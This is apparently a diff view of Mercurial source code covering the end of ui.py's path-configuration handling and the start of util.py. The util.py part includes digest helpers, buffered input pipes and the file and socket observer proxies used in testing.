2149 2165 # Only fall back to default if no path was requested.
2150 2166 if name is None:
2151 2167 if not default:
2152 2168 default = ()
2153 2169 elif not isinstance(default, (tuple, list)):
2154 2170 default = (default,)
2155 2171 for k in default:
2156 2172 try:
2157 2173 return self[k]
2158 2174 except KeyError:
2159 2175 continue
2160 2176 return None
2161 2177
2162 2178 # Most likely empty string.
2163 2179 # This may need to raise in the future.
2164 2180 if not name:
2165 2181 return None
2166 2182
2167 2183 try:
2168 2184 return self[name]
2169 2185 except KeyError:
2170 2186 # Try to resolve as a local path or URI.
2171 2187 try:
2172 2188 # We don't pass sub-options in, so no need to pass ui instance.
2173 2189 return path(None, None, rawloc=name)
2174 2190 except ValueError:
2175 2191 raise error.RepoError(_(b'repository %s does not exist') % name)
2176 2192
2177 2193
2178 2194 _pathsuboptions = {}
2179 2195
2180 2196
2181 2197 def pathsuboption(option, attr):
2182 2198 """Decorator used to declare a path sub-option.
2183 2199
2184 2200 Arguments are the sub-option name and the attribute it should set on
2185 2201 ``path`` instances.
2186 2202
2187 2203 The decorated function will receive as arguments a ``ui`` instance,
2188 2204 ``path`` instance, and the string value of this option from the config.
2189 2205 The function should return the value that will be set on the ``path``
2190 2206 instance.
2191 2207
2192 2208 This decorator can be used to perform additional verification of
2193 2209 sub-options and to change the type of sub-options.
2194 2210 """
2195 2211
2196 2212 def register(func):
2197 2213 _pathsuboptions[option] = (attr, func)
2198 2214 return func
2199 2215
2200 2216 return register
2201 2217
2202 2218
2203 2219 @pathsuboption(b'pushurl', b'pushloc')
2204 2220 def pushurlpathoption(ui, path, value):
2205 2221 u = util.url(value)
2206 2222 # Actually require a URL.
2207 2223 if not u.scheme:
2208 2224 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2209 2225 return None
2210 2226
2211 2227 # Don't support the #foo syntax in the push URL to declare branch to
2212 2228 # push.
2213 2229 if u.fragment:
2214 2230 ui.warn(
2215 2231 _(
2216 2232 b'("#fragment" in paths.%s:pushurl not supported; '
2217 2233 b'ignoring)\n'
2218 2234 )
2219 2235 % path.name
2220 2236 )
2221 2237 u.fragment = None
2222 2238
2223 2239 return bytes(u)
2224 2240
2225 2241
2226 2242 @pathsuboption(b'pushrev', b'pushrev')
2227 2243 def pushrevpathoption(ui, path, value):
2228 2244 return value
2229 2245
2230 2246
2231 2247 class path(object):
2232 2248 """Represents an individual path and its configuration."""
2233 2249
2234 2250 def __init__(self, ui, name, rawloc=None, suboptions=None):
2235 2251 """Construct a path from its config options.
2236 2252
2237 2253 ``ui`` is the ``ui`` instance the path is coming from.
2238 2254 ``name`` is the symbolic name of the path.
2239 2255 ``rawloc`` is the raw location, as defined in the config.
2240 2256 ``pushloc`` is the raw locations pushes should be made to.
2241 2257
2242 2258 If ``name`` is not defined, we require that the location be a) a local
2243 2259 filesystem path with a .hg directory or b) a URL. If not,
2244 2260 ``ValueError`` is raised.
2245 2261 """
2246 2262 if not rawloc:
2247 2263 raise ValueError(b'rawloc must be defined')
2248 2264
2249 2265 # Locations may define branches via syntax <base>#<branch>.
2250 2266 u = util.url(rawloc)
2251 2267 branch = None
2252 2268 if u.fragment:
2253 2269 branch = u.fragment
2254 2270 u.fragment = None
2255 2271
2256 2272 self.url = u
2257 2273 self.branch = branch
2258 2274
2259 2275 self.name = name
2260 2276 self.rawloc = rawloc
2261 2277 self.loc = b'%s' % u
2262 2278
2263 2279 # When given a raw location but not a symbolic name, validate the
2264 2280 # location is valid.
2265 2281 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
2266 2282 raise ValueError(
2267 2283 b'location is not a URL or path to a local '
2268 2284 b'repo: %s' % rawloc
2269 2285 )
2270 2286
2271 2287 suboptions = suboptions or {}
2272 2288
2273 2289 # Now process the sub-options. If a sub-option is registered, its
2274 2290 # attribute will always be present. The value will be None if there
2275 2291 # was no valid sub-option.
2276 2292 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2277 2293 if suboption not in suboptions:
2278 2294 setattr(self, attr, None)
2279 2295 continue
2280 2296
2281 2297 value = func(ui, self, suboptions[suboption])
2282 2298 setattr(self, attr, value)
2283 2299
2284 2300 def _isvalidlocalpath(self, path):
2285 2301 """Returns True if the given path is a potentially valid repository.
2286 2302 This is its own function so that extensions can change the definition of
2287 2303 'valid' in this case (like when pulling from a git repo into a hg
2288 2304 one)."""
2289 2305 try:
2290 2306 return os.path.isdir(os.path.join(path, b'.hg'))
2291 2307 # Python 2 may return TypeError. Python 3, ValueError.
2292 2308 except (TypeError, ValueError):
2293 2309 return False
2294 2310
2295 2311 @property
2296 2312 def suboptions(self):
2297 2313 """Return sub-options and their values for this path.
2298 2314
2299 2315 This is intended to be used for presentation purposes.
2300 2316 """
2301 2317 d = {}
2302 2318 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2303 2319 value = getattr(self, attr)
2304 2320 if value is not None:
2305 2321 d[subopt] = value
2306 2322 return d
2307 2323
2308 2324
2309 2325 # we instantiate one globally shared progress bar to avoid
2310 2326 # competing progress bars when multiple UI objects get created
2311 2327 _progresssingleton = None
2312 2328
2313 2329
2314 2330 def getprogbar(ui):
2315 2331 global _progresssingleton
2316 2332 if _progresssingleton is None:
2317 2333 # passing 'ui' object to the singleton is fishy,
2318 2334 # this is how the extension used to work but feel free to rework it.
2319 2335 _progresssingleton = progress.progbar(ui)
2320 2336 return _progresssingleton
2321 2337
2322 2338
2323 2339 def haveprogbar():
2324 2340 return _progresssingleton is not None
2325 2341
2326 2342
2327 2343 def _selectmsgdests(ui):
2328 2344 name = ui.config(b'ui', b'message-output')
2329 2345 if name == b'channel':
2330 2346 if ui.fmsg:
2331 2347 return ui.fmsg, ui.fmsg
2332 2348 else:
2333 2349 # fall back to ferr if channel isn't ready so that status/error
2334 2350 # messages can be printed
2335 2351 return ui.ferr, ui.ferr
2336 2352 if name == b'stdio':
2337 2353 return ui.fout, ui.ferr
2338 2354 if name == b'stderr':
2339 2355 return ui.ferr, ui.ferr
2340 2356 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2341 2357
2342 2358
2343 2359 def _writemsgwith(write, dest, *args, **opts):
2344 2360 """Write ui message with the given ui._write*() function
2345 2361
2346 2362 The specified message type is translated to 'ui.<type>' label if the dest
2347 2363 isn't a structured channel, so that the message will be colorized.
2348 2364 """
2349 2365 # TODO: maybe change 'type' to a mandatory option
2350 2366 if 'type' in opts and not getattr(dest, 'structured', False):
2351 2367 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2352 2368 write(dest, *args, **opts)
@@ -1,3628 +1,3669 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from hgdemandimport import tracing
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 node as nodemod,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 base85 = policy.importmod('base85')
63 63 osutil = policy.importmod('osutil')
64 64
65 65 b85decode = base85.b85decode
66 66 b85encode = base85.b85encode
67 67
68 68 cookielib = pycompat.cookielib
69 69 httplib = pycompat.httplib
70 70 pickle = pycompat.pickle
71 71 safehasattr = pycompat.safehasattr
72 72 socketserver = pycompat.socketserver
73 73 bytesio = pycompat.bytesio
74 74 # TODO deprecate stringio name, as it is a lie on Python 3.
75 75 stringio = bytesio
76 76 xmlrpclib = pycompat.xmlrpclib
77 77
78 78 httpserver = urllibcompat.httpserver
79 79 urlerr = urllibcompat.urlerr
80 80 urlreq = urllibcompat.urlreq
81 81
82 82 # workaround for win32mbcs
83 83 _filenamebytestr = pycompat.bytestr
84 84
85 85 if pycompat.iswindows:
86 86 from . import windows as platform
87 87 else:
88 88 from . import posix as platform
89 89
90 90 _ = i18n._
91 91
92 92 bindunixsocket = platform.bindunixsocket
93 93 cachestat = platform.cachestat
94 94 checkexec = platform.checkexec
95 95 checklink = platform.checklink
96 96 copymode = platform.copymode
97 97 expandglobs = platform.expandglobs
98 98 getfsmountpoint = platform.getfsmountpoint
99 99 getfstype = platform.getfstype
100 100 groupmembers = platform.groupmembers
101 101 groupname = platform.groupname
102 102 isexec = platform.isexec
103 103 isowner = platform.isowner
104 104 listdir = osutil.listdir
105 105 localpath = platform.localpath
106 106 lookupreg = platform.lookupreg
107 107 makedir = platform.makedir
108 108 nlinks = platform.nlinks
109 109 normpath = platform.normpath
110 110 normcase = platform.normcase
111 111 normcasespec = platform.normcasespec
112 112 normcasefallback = platform.normcasefallback
113 113 openhardlinks = platform.openhardlinks
114 114 oslink = platform.oslink
115 115 parsepatchoutput = platform.parsepatchoutput
116 116 pconvert = platform.pconvert
117 117 poll = platform.poll
118 118 posixfile = platform.posixfile
119 119 readlink = platform.readlink
120 120 rename = platform.rename
121 121 removedirs = platform.removedirs
122 122 samedevice = platform.samedevice
123 123 samefile = platform.samefile
124 124 samestat = platform.samestat
125 125 setflags = platform.setflags
126 126 split = platform.split
127 127 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
128 128 statisexec = platform.statisexec
129 129 statislink = platform.statislink
130 130 umask = platform.umask
131 131 unlink = platform.unlink
132 132 username = platform.username
133 133
134 134
135 135 def setumask(val):
136 136 ''' updates the umask. used by chg server '''
137 137 if pycompat.iswindows:
138 138 return
139 139 os.umask(val)
140 140 global umask
141 141 platform.umask = umask = val & 0o777
142 142
143 143
144 144 # small compat layer
145 145 compengines = compression.compengines
146 146 SERVERROLE = compression.SERVERROLE
147 147 CLIENTROLE = compression.CLIENTROLE
148 148
149 149 try:
150 150 recvfds = osutil.recvfds
151 151 except AttributeError:
152 152 pass
153 153
154 154 # Python compatibility
155 155
156 156 _notset = object()
157 157
158 158
159 159 def bitsfrom(container):
160 160 bits = 0
161 161 for bit in container:
162 162 bits |= bit
163 163 return bits
164 164
165 165
166 166 # python 2.6 still have deprecation warning enabled by default. We do not want
167 167 # to display anything to standard user so detect if we are running test and
168 168 # only use python deprecation warning in this case.
169 169 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
170 170 if _dowarn:
171 171 # explicitly unfilter our warning for python 2.7
172 172 #
173 173 # The option of setting PYTHONWARNINGS in the test runner was investigated.
174 174 # However, module name set through PYTHONWARNINGS was exactly matched, so
175 175 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
176 176 # makes the whole PYTHONWARNINGS thing useless for our usecase.
177 177 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
178 178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
179 179 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
180 180 if _dowarn and pycompat.ispy3:
181 181 # silence warning emitted by passing user string to re.sub()
182 182 warnings.filterwarnings(
183 183 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
184 184 )
185 185 warnings.filterwarnings(
186 186 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
187 187 )
188 188 # TODO: reinvent imp.is_frozen()
189 189 warnings.filterwarnings(
190 190 'ignore',
191 191 'the imp module is deprecated',
192 192 DeprecationWarning,
193 193 'mercurial',
194 194 )
195 195
196 196
197 197 def nouideprecwarn(msg, version, stacklevel=1):
198 198 """Issue an python native deprecation warning
199 199
200 200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
201 201 """
202 202 if _dowarn:
203 203 msg += (
204 204 b"\n(compatibility will be dropped after Mercurial-%s,"
205 205 b" update your code.)"
206 206 ) % version
207 207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
208 208 # on python 3 with chg, we will need to explicitly flush the output
209 209 sys.stderr.flush()
210 210
211 211
212 212 DIGESTS = {
213 213 b'md5': hashlib.md5,
214 214 b'sha1': hashutil.sha1,
215 215 b'sha512': hashlib.sha512,
216 216 }
217 217 # List of digest types from strongest to weakest
218 218 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
219 219
220 220 for k in DIGESTS_BY_STRENGTH:
221 221 assert k in DIGESTS
222 222
223 223
224 224 class digester(object):
225 225 """helper to compute digests.
226 226
227 227 This helper can be used to compute one or more digests given their name.
228 228
229 229 >>> d = digester([b'md5', b'sha1'])
230 230 >>> d.update(b'foo')
231 231 >>> [k for k in sorted(d)]
232 232 ['md5', 'sha1']
233 233 >>> d[b'md5']
234 234 'acbd18db4cc2f85cedef654fccc4a4d8'
235 235 >>> d[b'sha1']
236 236 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
237 237 >>> digester.preferred([b'md5', b'sha1'])
238 238 'sha1'
239 239 """
240 240
241 241 def __init__(self, digests, s=b''):
242 242 self._hashes = {}
243 243 for k in digests:
244 244 if k not in DIGESTS:
245 245 raise error.Abort(_(b'unknown digest type: %s') % k)
246 246 self._hashes[k] = DIGESTS[k]()
247 247 if s:
248 248 self.update(s)
249 249
250 250 def update(self, data):
251 251 for h in self._hashes.values():
252 252 h.update(data)
253 253
254 254 def __getitem__(self, key):
255 255 if key not in DIGESTS:
256 256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 257 return nodemod.hex(self._hashes[key].digest())
258 258
259 259 def __iter__(self):
260 260 return iter(self._hashes)
261 261
262 262 @staticmethod
263 263 def preferred(supported):
264 264 """returns the strongest digest type in both supported and DIGESTS."""
265 265
266 266 for k in DIGESTS_BY_STRENGTH:
267 267 if k in supported:
268 268 return k
269 269 return None
270 270
271 271
272 272 class digestchecker(object):
273 273 """file handle wrapper that additionally checks content against a given
274 274 size and digests.
275 275
276 276 d = digestchecker(fh, size, {'md5': '...'})
277 277
278 278 When multiple digests are given, all of them are validated.
279 279 """
280 280
281 281 def __init__(self, fh, size, digests):
282 282 self._fh = fh
283 283 self._size = size
284 284 self._got = 0
285 285 self._digests = dict(digests)
286 286 self._digester = digester(self._digests.keys())
287 287
288 288 def read(self, length=-1):
289 289 content = self._fh.read(length)
290 290 self._digester.update(content)
291 291 self._got += len(content)
292 292 return content
293 293
294 294 def validate(self):
295 295 if self._size != self._got:
296 296 raise error.Abort(
297 297 _(b'size mismatch: expected %d, got %d')
298 298 % (self._size, self._got)
299 299 )
300 300 for k, v in self._digests.items():
301 301 if v != self._digester[k]:
302 302 # i18n: first parameter is a digest name
303 303 raise error.Abort(
304 304 _(b'%s mismatch: expected %s, got %s')
305 305 % (k, v, self._digester[k])
306 306 )
307 307
308 308
309 309 try:
310 310 buffer = buffer
311 311 except NameError:
312 312
313 313 def buffer(sliceable, offset=0, length=None):
314 314 if length is not None:
315 315 return memoryview(sliceable)[offset : offset + length]
316 316 return memoryview(sliceable)[offset:]
317 317
318 318
319 319 _chunksize = 4096
320 320
321 321
322 322 class bufferedinputpipe(object):
323 323 """a manually buffered input pipe
324 324
325 325 Python will not let us use buffered IO and lazy reading with 'polling' at
326 326 the same time. We cannot probe the buffer state and select will not detect
327 327 that data are ready to read if they are already buffered.
328 328
329 329 This class let us work around that by implementing its own buffering
330 330 (allowing efficient readline) while offering a way to know if the buffer is
331 331 empty from the output (allowing collaboration of the buffer with polling).
332 332
333 333 This class lives in the 'util' module because it makes use of the 'os'
334 334 module from the python stdlib.
335 335 """
336 336
337 337 def __new__(cls, fh):
338 338 # If we receive a fileobjectproxy, we need to use a variation of this
339 339 # class that notifies observers about activity.
340 340 if isinstance(fh, fileobjectproxy):
341 341 cls = observedbufferedinputpipe
342 342
343 343 return super(bufferedinputpipe, cls).__new__(cls)
344 344
345 345 def __init__(self, input):
346 346 self._input = input
347 347 self._buffer = []
348 348 self._eof = False
349 349 self._lenbuf = 0
350 350
351 351 @property
352 352 def hasbuffer(self):
353 353 """True is any data is currently buffered
354 354
355 355 This will be used externally a pre-step for polling IO. If there is
356 356 already data then no polling should be set in place."""
357 357 return bool(self._buffer)
358 358
359 359 @property
360 360 def closed(self):
361 361 return self._input.closed
362 362
363 363 def fileno(self):
364 364 return self._input.fileno()
365 365
366 366 def close(self):
367 367 return self._input.close()
368 368
369 369 def read(self, size):
370 370 while (not self._eof) and (self._lenbuf < size):
371 371 self._fillbuffer()
372 372 return self._frombuffer(size)
373 373
374 374 def unbufferedread(self, size):
375 375 if not self._eof and self._lenbuf == 0:
376 376 self._fillbuffer(max(size, _chunksize))
377 377 return self._frombuffer(min(self._lenbuf, size))
378 378
379 379 def readline(self, *args, **kwargs):
380 380 if len(self._buffer) > 1:
381 381 # this should not happen because both read and readline end with a
382 382 # _frombuffer call that collapse it.
383 383 self._buffer = [b''.join(self._buffer)]
384 384 self._lenbuf = len(self._buffer[0])
385 385 lfi = -1
386 386 if self._buffer:
387 387 lfi = self._buffer[-1].find(b'\n')
388 388 while (not self._eof) and lfi < 0:
389 389 self._fillbuffer()
390 390 if self._buffer:
391 391 lfi = self._buffer[-1].find(b'\n')
392 392 size = lfi + 1
393 393 if lfi < 0: # end of file
394 394 size = self._lenbuf
395 395 elif len(self._buffer) > 1:
396 396 # we need to take previous chunks into account
397 397 size += self._lenbuf - len(self._buffer[-1])
398 398 return self._frombuffer(size)
399 399
400 400 def _frombuffer(self, size):
401 401 """return at most 'size' data from the buffer
402 402
403 403 The data are removed from the buffer."""
404 404 if size == 0 or not self._buffer:
405 405 return b''
406 406 buf = self._buffer[0]
407 407 if len(self._buffer) > 1:
408 408 buf = b''.join(self._buffer)
409 409
410 410 data = buf[:size]
411 411 buf = buf[len(data) :]
412 412 if buf:
413 413 self._buffer = [buf]
414 414 self._lenbuf = len(buf)
415 415 else:
416 416 self._buffer = []
417 417 self._lenbuf = 0
418 418 return data
419 419
420 420 def _fillbuffer(self, size=_chunksize):
421 421 """read data to the buffer"""
422 422 data = os.read(self._input.fileno(), size)
423 423 if not data:
424 424 self._eof = True
425 425 else:
426 426 self._lenbuf += len(data)
427 427 self._buffer.append(data)
428 428
429 429 return data
430 430
431 431
432 432 def mmapread(fp, size=None):
433 433 if size == 0:
434 434 # size of 0 to mmap.mmap() means "all data"
435 435 # rather than "zero bytes", so special case that.
436 436 return b''
437 437 elif size is None:
438 438 size = 0
439 439 try:
440 440 fd = getattr(fp, 'fileno', lambda: fp)()
441 441 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
442 442 except ValueError:
443 443 # Empty files cannot be mmapped, but mmapread should still work. Check
444 444 # if the file is empty, and if so, return an empty buffer.
445 445 if os.fstat(fd).st_size == 0:
446 446 return b''
447 447 raise
448 448
449 449
450 450 class fileobjectproxy(object):
451 451 """A proxy around file objects that tells a watcher when events occur.
452 452
453 453 This type is intended to only be used for testing purposes. Think hard
454 454 before using it in important code.
455 455 """
456 456
457 457 __slots__ = (
458 458 '_orig',
459 459 '_observer',
460 460 )
461 461
462 462 def __init__(self, fh, observer):
463 463 object.__setattr__(self, '_orig', fh)
464 464 object.__setattr__(self, '_observer', observer)
465 465
466 466 def __getattribute__(self, name):
467 467 ours = {
468 468 '_observer',
469 469 # IOBase
470 470 'close',
471 471 # closed if a property
472 472 'fileno',
473 473 'flush',
474 474 'isatty',
475 475 'readable',
476 476 'readline',
477 477 'readlines',
478 478 'seek',
479 479 'seekable',
480 480 'tell',
481 481 'truncate',
482 482 'writable',
483 483 'writelines',
484 484 # RawIOBase
485 485 'read',
486 486 'readall',
487 487 'readinto',
488 488 'write',
489 489 # BufferedIOBase
490 490 # raw is a property
491 491 'detach',
492 492 # read defined above
493 493 'read1',
494 494 # readinto defined above
495 495 # write defined above
496 496 }
497 497
498 498 # We only observe some methods.
499 499 if name in ours:
500 500 return object.__getattribute__(self, name)
501 501
502 502 return getattr(object.__getattribute__(self, '_orig'), name)
503 503
504 504 def __nonzero__(self):
505 505 return bool(object.__getattribute__(self, '_orig'))
506 506
507 507 __bool__ = __nonzero__
508 508
509 509 def __delattr__(self, name):
510 510 return delattr(object.__getattribute__(self, '_orig'), name)
511 511
512 512 def __setattr__(self, name, value):
513 513 return setattr(object.__getattribute__(self, '_orig'), name, value)
514 514
515 515 def __iter__(self):
516 516 return object.__getattribute__(self, '_orig').__iter__()
517 517
518 518 def _observedcall(self, name, *args, **kwargs):
519 519 # Call the original object.
520 520 orig = object.__getattribute__(self, '_orig')
521 521 res = getattr(orig, name)(*args, **kwargs)
522 522
523 523 # Call a method on the observer of the same name with arguments
524 524 # so it can react, log, etc.
525 525 observer = object.__getattribute__(self, '_observer')
526 526 fn = getattr(observer, name, None)
527 527 if fn:
528 528 fn(res, *args, **kwargs)
529 529
530 530 return res
531 531
532 532 def close(self, *args, **kwargs):
533 533 return object.__getattribute__(self, '_observedcall')(
534 534 'close', *args, **kwargs
535 535 )
536 536
537 537 def fileno(self, *args, **kwargs):
538 538 return object.__getattribute__(self, '_observedcall')(
539 539 'fileno', *args, **kwargs
540 540 )
541 541
542 542 def flush(self, *args, **kwargs):
543 543 return object.__getattribute__(self, '_observedcall')(
544 544 'flush', *args, **kwargs
545 545 )
546 546
547 547 def isatty(self, *args, **kwargs):
548 548 return object.__getattribute__(self, '_observedcall')(
549 549 'isatty', *args, **kwargs
550 550 )
551 551
552 552 def readable(self, *args, **kwargs):
553 553 return object.__getattribute__(self, '_observedcall')(
554 554 'readable', *args, **kwargs
555 555 )
556 556
557 557 def readline(self, *args, **kwargs):
558 558 return object.__getattribute__(self, '_observedcall')(
559 559 'readline', *args, **kwargs
560 560 )
561 561
562 562 def readlines(self, *args, **kwargs):
563 563 return object.__getattribute__(self, '_observedcall')(
564 564 'readlines', *args, **kwargs
565 565 )
566 566
567 567 def seek(self, *args, **kwargs):
568 568 return object.__getattribute__(self, '_observedcall')(
569 569 'seek', *args, **kwargs
570 570 )
571 571
572 572 def seekable(self, *args, **kwargs):
573 573 return object.__getattribute__(self, '_observedcall')(
574 574 'seekable', *args, **kwargs
575 575 )
576 576
577 577 def tell(self, *args, **kwargs):
578 578 return object.__getattribute__(self, '_observedcall')(
579 579 'tell', *args, **kwargs
580 580 )
581 581
582 582 def truncate(self, *args, **kwargs):
583 583 return object.__getattribute__(self, '_observedcall')(
584 584 'truncate', *args, **kwargs
585 585 )
586 586
587 587 def writable(self, *args, **kwargs):
588 588 return object.__getattribute__(self, '_observedcall')(
589 589 'writable', *args, **kwargs
590 590 )
591 591
592 592 def writelines(self, *args, **kwargs):
593 593 return object.__getattribute__(self, '_observedcall')(
594 594 'writelines', *args, **kwargs
595 595 )
596 596
597 597 def read(self, *args, **kwargs):
598 598 return object.__getattribute__(self, '_observedcall')(
599 599 'read', *args, **kwargs
600 600 )
601 601
602 602 def readall(self, *args, **kwargs):
603 603 return object.__getattribute__(self, '_observedcall')(
604 604 'readall', *args, **kwargs
605 605 )
606 606
607 607 def readinto(self, *args, **kwargs):
608 608 return object.__getattribute__(self, '_observedcall')(
609 609 'readinto', *args, **kwargs
610 610 )
611 611
612 612 def write(self, *args, **kwargs):
613 613 return object.__getattribute__(self, '_observedcall')(
614 614 'write', *args, **kwargs
615 615 )
616 616
617 617 def detach(self, *args, **kwargs):
618 618 return object.__getattribute__(self, '_observedcall')(
619 619 'detach', *args, **kwargs
620 620 )
621 621
622 622 def read1(self, *args, **kwargs):
623 623 return object.__getattribute__(self, '_observedcall')(
624 624 'read1', *args, **kwargs
625 625 )
626 626
627 627
628 628 class observedbufferedinputpipe(bufferedinputpipe):
629 629 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
630 630
631 631 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
632 632 bypass ``fileobjectproxy``. Because of this, we need to make
633 633 ``bufferedinputpipe`` aware of these operations.
634 634
635 635 This variation of ``bufferedinputpipe`` can notify observers about
636 636 ``os.read()`` events. It also re-publishes other events, such as
637 637 ``read()`` and ``readline()``.
638 638 """
639 639
640 640 def _fillbuffer(self):
641 641 res = super(observedbufferedinputpipe, self)._fillbuffer()
642 642
643 643 fn = getattr(self._input._observer, 'osread', None)
644 644 if fn:
645 645 fn(res, _chunksize)
646 646
647 647 return res
648 648
649 649 # We use different observer methods because the operation isn't
650 650 # performed on the actual file object but on us.
651 651 def read(self, size):
652 652 res = super(observedbufferedinputpipe, self).read(size)
653 653
654 654 fn = getattr(self._input._observer, 'bufferedread', None)
655 655 if fn:
656 656 fn(res, size)
657 657
658 658 return res
659 659
660 660 def readline(self, *args, **kwargs):
661 661 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
662 662
663 663 fn = getattr(self._input._observer, 'bufferedreadline', None)
664 664 if fn:
665 665 fn(res)
666 666
667 667 return res
668 668
669 669
670 670 PROXIED_SOCKET_METHODS = {
671 671 'makefile',
672 672 'recv',
673 673 'recvfrom',
674 674 'recvfrom_into',
675 675 'recv_into',
676 676 'send',
677 677 'sendall',
678 678 'sendto',
679 679 'setblocking',
680 680 'settimeout',
681 681 'gettimeout',
682 682 'setsockopt',
683 683 }
684 684
685 685
686 686 class socketproxy(object):
687 687 """A proxy around a socket that tells a watcher when events occur.
688 688
689 689 This is like ``fileobjectproxy`` except for sockets.
690 690
691 691 This type is intended to only be used for testing purposes. Think hard
692 692 before using it in important code.
693 693 """
694 694
695 695 __slots__ = (
696 696 '_orig',
697 697 '_observer',
698 698 )
699 699
700 700 def __init__(self, sock, observer):
701 701 object.__setattr__(self, '_orig', sock)
702 702 object.__setattr__(self, '_observer', observer)
703 703
704 704 def __getattribute__(self, name):
705 705 if name in PROXIED_SOCKET_METHODS:
706 706 return object.__getattribute__(self, name)
707 707
708 708 return getattr(object.__getattribute__(self, '_orig'), name)
709 709
710 710 def __delattr__(self, name):
711 711 return delattr(object.__getattribute__(self, '_orig'), name)
712 712
713 713 def __setattr__(self, name, value):
714 714 return setattr(object.__getattribute__(self, '_orig'), name, value)
715 715
716 716 def __nonzero__(self):
717 717 return bool(object.__getattribute__(self, '_orig'))
718 718
719 719 __bool__ = __nonzero__
720 720
721 721 def _observedcall(self, name, *args, **kwargs):
722 722 # Call the original object.
723 723 orig = object.__getattribute__(self, '_orig')
724 724 res = getattr(orig, name)(*args, **kwargs)
725 725
726 726 # Call a method on the observer of the same name with arguments
727 727 # so it can react, log, etc.
728 728 observer = object.__getattribute__(self, '_observer')
729 729 fn = getattr(observer, name, None)
730 730 if fn:
731 731 fn(res, *args, **kwargs)
732 732
733 733 return res
734 734
735 735 def makefile(self, *args, **kwargs):
736 736 res = object.__getattribute__(self, '_observedcall')(
737 737 'makefile', *args, **kwargs
738 738 )
739 739
740 740 # The file object may be used for I/O. So we turn it into a
741 741 # proxy using our observer.
742 742 observer = object.__getattribute__(self, '_observer')
743 743 return makeloggingfileobject(
744 744 observer.fh,
745 745 res,
746 746 observer.name,
747 747 reads=observer.reads,
748 748 writes=observer.writes,
749 749 logdata=observer.logdata,
750 750 logdataapis=observer.logdataapis,
751 751 )
752 752
753 753 def recv(self, *args, **kwargs):
754 754 return object.__getattribute__(self, '_observedcall')(
755 755 'recv', *args, **kwargs
756 756 )
757 757
758 758 def recvfrom(self, *args, **kwargs):
759 759 return object.__getattribute__(self, '_observedcall')(
760 760 'recvfrom', *args, **kwargs
761 761 )
762 762
763 763 def recvfrom_into(self, *args, **kwargs):
764 764 return object.__getattribute__(self, '_observedcall')(
765 765 'recvfrom_into', *args, **kwargs
766 766 )
767 767
768 768 def recv_into(self, *args, **kwargs):
769 769 return object.__getattribute__(self, '_observedcall')(
770 770 'recv_info', *args, **kwargs
771 771 )
772 772
773 773 def send(self, *args, **kwargs):
774 774 return object.__getattribute__(self, '_observedcall')(
775 775 'send', *args, **kwargs
776 776 )
777 777
778 778 def sendall(self, *args, **kwargs):
779 779 return object.__getattribute__(self, '_observedcall')(
780 780 'sendall', *args, **kwargs
781 781 )
782 782
783 783 def sendto(self, *args, **kwargs):
784 784 return object.__getattribute__(self, '_observedcall')(
785 785 'sendto', *args, **kwargs
786 786 )
787 787
788 788 def setblocking(self, *args, **kwargs):
789 789 return object.__getattribute__(self, '_observedcall')(
790 790 'setblocking', *args, **kwargs
791 791 )
792 792
793 793 def settimeout(self, *args, **kwargs):
794 794 return object.__getattribute__(self, '_observedcall')(
795 795 'settimeout', *args, **kwargs
796 796 )
797 797
798 798 def gettimeout(self, *args, **kwargs):
799 799 return object.__getattribute__(self, '_observedcall')(
800 800 'gettimeout', *args, **kwargs
801 801 )
802 802
803 803 def setsockopt(self, *args, **kwargs):
804 804 return object.__getattribute__(self, '_observedcall')(
805 805 'setsockopt', *args, **kwargs
806 806 )
807 807
808 808
809 809 class baseproxyobserver(object):
810 810 def __init__(self, fh, name, logdata, logdataapis):
811 811 self.fh = fh
812 812 self.name = name
813 813 self.logdata = logdata
814 814 self.logdataapis = logdataapis
815 815
816 816 def _writedata(self, data):
817 817 if not self.logdata:
818 818 if self.logdataapis:
819 819 self.fh.write(b'\n')
820 820 self.fh.flush()
821 821 return
822 822
823 823 # Simple case writes all data on a single line.
